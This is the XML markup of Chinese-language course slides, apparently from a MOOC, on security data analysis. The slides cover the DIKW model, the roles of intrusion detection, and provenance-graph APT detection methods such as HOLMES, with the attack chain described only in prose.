              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构建安全智能，首先面对的问题就是如何组织数据。首先简单回顾一下数据、信息、知识和智慧的金字塔分层模型DIKW</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从“数据”到“智慧”的路途漫漫，不过随着攻防对抗的持续，安全行业的发展已经为我们触及安全智慧的边缘打下了夯实的基础。在此，我们将常见的安全数据按照DIKW模型进行粗略的分类：</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数据层（Data，原始的未经加工的）：应用日志、主机日志、网络流量日志、蜜罐日志、网络架构数据、业务层数据等。</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信息层（Information，基于规则和行为的匹配加工的数据，有明确意义和时效的）：各类检测日志，包括单数据源的检测和关联的检测；各类评估日志，包括主动获取的资产数据、脆弱性数据等；威胁情报。</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知识层（Knowledge，归纳的信息，可演绎推理）：各类规范和知识库，如CWE、CNNVD、CAPEC、ATT&amp;CK等。</a:t>
            </a:r>
          </a:p>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以上分类大体说明了当前安全数据分析所能够掌握的资源及其层次。在安全数据分析的语境下，我们使用的“数据”一词表示所使用的一切数字资源，包括了数据层、信息层和知识层的结合。DIKW的模型描述了数据的分层结构，也是网络安全中最直接的处理模式的层次。</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具体来说，入侵检测系统的主要作用包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a: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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>统计分析黑客在攻击前的探测行为，预先给管理员发出警报。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="0"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charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a: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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测和记录网络中的攻击事件，阻断攻击行为，防止入侵事件的发生。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="0"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charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a: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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提供有关攻击的详细信息，帮助管理员诊断和修补网络中存在的安全弱点。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="0"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charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>同时，它也可以：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a: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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测其他未授权操作或安全违规行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a: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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>报告计算机或网络系统中存在的安全威胁。</a:t>
            </a:r>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传统IDPS和EDR规则检测，只能检测简单攻击，即攻击分布在单条系统监控日志，或者多条系统日志序列中，而高级的攻击可能会跨序列，以攻击图的形式存在。</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endParaRPr lang="zh-CN">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>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基于终端溯源图（Provenance graph）的APT检测方法成为研究热点。该方法将系统监控日志（System audit logs）转化为有向无环的溯源图来记录终端行为，其中节点代表不同类型的系统操作实体（例如，进程，文件和网络），边代表系统事件（例如，进程创建了一个文件）。相比传统IDPS和EDR单条系统监控日志，溯源图中包含的上下文信息能够更好的刻画APT攻击中的高级攻击特征，从而减少APT检测的误报和漏报。</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n>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>图展示了APT攻击示例，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者通过恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务漏洞，下载和执行恶意文件，外联远程命令与控制（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C&amp;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）服务器。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统监控日志转化为终端溯源图，通过检测算法检测发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击链。</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从黑白的角度，检测方法分为两种，即基于白名单的检测方法和基于黑名单的检测方法</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在应对各种未知威胁的场景，基于判白的基线学习能发挥积极的效果；通过自适应的算法与模型在针对单个保护对象进行行为的描述与统计，</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一般学习周期在15-30天左右建立”白”的行为基线，一旦发生黑客入侵场景由于黑客对业务场景的不熟悉，呈现的行为与正常的业务行为具有明确</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的异常，无论攻击者使用了怎么样的0-day和武器、基于行为的模型均能准确识别异常；</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HOLMES是一种基于黑名单检测APT(Advanced Persistent Threat)攻击的系统。该系统实时的汇总攻击者的攻击行为，并基于kill-chain(攻击链)构建高级溯源图。</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上图展示了黑名单检测方法的一般流程，首先收集日志，构建溯源图；其次通过定义检测规则，从溯源图中找到疑似攻击的子图，最后通过排序打分，筛选出真正的攻击。</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下图展示了检测的核心思路，当前复杂攻击溯源面临的挑战是低级别日志数据与攻击者目标、意图和能力相关高层视角之间的巨大语义鸿沟。为了弥合低级系统调用视角和高级攻击链视角之间的语义差距，HOLMES构建了一个中间层HSG(高级场景图)。HSG节点是TTP(Tactics, Techniques and Procedures)中的实体,边表示TTP之间的信息流。本质上HOLMES是通过专家实现了由底层日志数据到TTP的映射。如下图所示,中间层HSG是基于MITRE的ATT&amp;CK框架做的一种语义层的抽象，它描述了近200种行为模式和TTP。</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现有终端溯源图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击检测方法一般流程如上图所示，系统日志收集到之后，进行检测，生成告警图，安全分析人员进行研判，识别误报和真正的攻击；</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主要存在三个问题，对应的衡量指标和数值在框框中已给出。例如问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行成本高，真正企业能够承担的成本，内存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>100MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>以内，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CPU3-5%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>告警质量差，包括告警数量和告警子图的节点规模；问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语义鸿沟，如何从低级的系统审计日志映射到高级别的攻击活动。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这些问题留待我们同学们去探索和建设！</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2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="5B76B5"/>
                </a:solidFill>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503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260000"/>
            <a:ext cx="5181600" cy="50400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260000"/>
            <a:ext cx="5181600" cy="5040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6676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左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260000"/>
            <a:ext cx="5181600" cy="50400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3032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右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4" name="内容占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1260000"/>
            <a:ext cx="5181600" cy="50400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193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260000"/>
            <a:ext cx="5157787" cy="64800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1980000"/>
            <a:ext cx="5157787" cy="4320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260000"/>
            <a:ext cx="5183188" cy="64800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1980000"/>
            <a:ext cx="5183188" cy="4320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标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E052F9C-1822-46C3-AD46-5165D68F6EB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="540000"/>
            <a:ext cx="10515600" cy="648000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3708014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M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文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{814C9FCE-7345-434B-8DDC-C2E0D949A0C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10224000" y="6372000"/>
            <a:ext cx="1555234" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" u="none" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>MOOC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" u="none" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>自学</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382341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_章目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D2E17-533F-4A14-A61D-D7A8C58D2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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6952D97-9164-485C-B0B1-33851EDDC4AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="7080203">
            <a:off x="8818696" y="656618"/>
            <a:ext cx="569921" cy="413062"/>
            <a:chOff x="8171726" y="1006998"/>
            <a:chExt cx="1261641" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CE7ACFE-E614-4BB3-92F1-2C4BE0C904E3}"/>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7EBB26C-B80C-42BD-8193-ADC7866119DE}"/>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C9D0A66-F1E4-4C21-9D8E-6BE3CCF6C9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="648000" y="5099562"/>
            <a:ext cx="1261641" cy="914400"/>
            <a:chOff x="8171726" y="1006998"/>
            <a:chExt cx="1261641" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="椭圆 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B330067F-2988-4C9A-8715-0F6C25592138}"/>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7AF48C3-A5BF-449D-8972-62F6343C5018}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0559128A-AA16-4688-BCA9-8FC8545D2A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E41108F-F803-49C5-B809-3D860440372E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10224000" y="6372000"/>
            <a:ext cx="1555234" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" u="none" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>MOOC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" u="none" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>自学</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142113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273814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8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目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D2E17-533F-4A14-A61D-D7A8C58D2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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6952D97-9164-485C-B0B1-33851EDDC4AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="7080203">
            <a:off x="8818696" y="656618"/>
            <a:ext cx="569921" cy="413062"/>
            <a:chOff x="8171726" y="1006998"/>
            <a:chExt cx="1261641" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CE7ACFE-E614-4BB3-92F1-2C4BE0C904E3}"/>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7EBB26C-B80C-42BD-8193-ADC7866119DE}"/>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C9D0A66-F1E4-4C21-9D8E-6BE3CCF6C9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="648000" y="5099562"/>
            <a:ext cx="1261641" cy="914400"/>
            <a:chOff x="8171726" y="1006998"/>
            <a:chExt cx="1261641" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="椭圆 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B330067F-2988-4C9A-8715-0F6C25592138}"/>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7AF48C3-A5BF-449D-8972-62F6343C5018}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0559128A-AA16-4688-BCA9-8FC8545D2A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="内容占位符 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E07E96E3-804D-4159-B353-C747ECEB2FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1909763" y="1720924"/>
            <a:ext cx="8372474" cy="44890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681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目录">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D2E17-533F-4A14-A61D-D7A8C58D2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62" t="41067" r="19510" b="1426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3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6952D97-9164-485C-B0B1-33851EDDC4AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="7080203">
            <a:off x="8818696" y="656618"/>
            <a:ext cx="569921" cy="413062"/>
            <a:chOff x="8171726" y="1006998"/>
            <a:chExt cx="1261641" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CE7ACFE-E614-4BB3-92F1-2C4BE0C904E3}"/>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7EBB26C-B80C-42BD-8193-ADC7866119DE}"/>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C9D0A66-F1E4-4C21-9D8E-6BE3CCF6C9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="648000" y="5099562"/>
            <a:ext cx="1261641" cy="914400"/>
            <a:chOff x="8171726" y="1006998"/>
            <a:chExt cx="1261641" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="椭圆 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B330067F-2988-4C9A-8715-0F6C25592138}"/>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7AF48C3-A5BF-449D-8972-62F6343C5018}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0559128A-AA16-4688-BCA9-8FC8545D2A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648000" y="648000"/>
            <a:ext cx="7386638" cy="738664"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
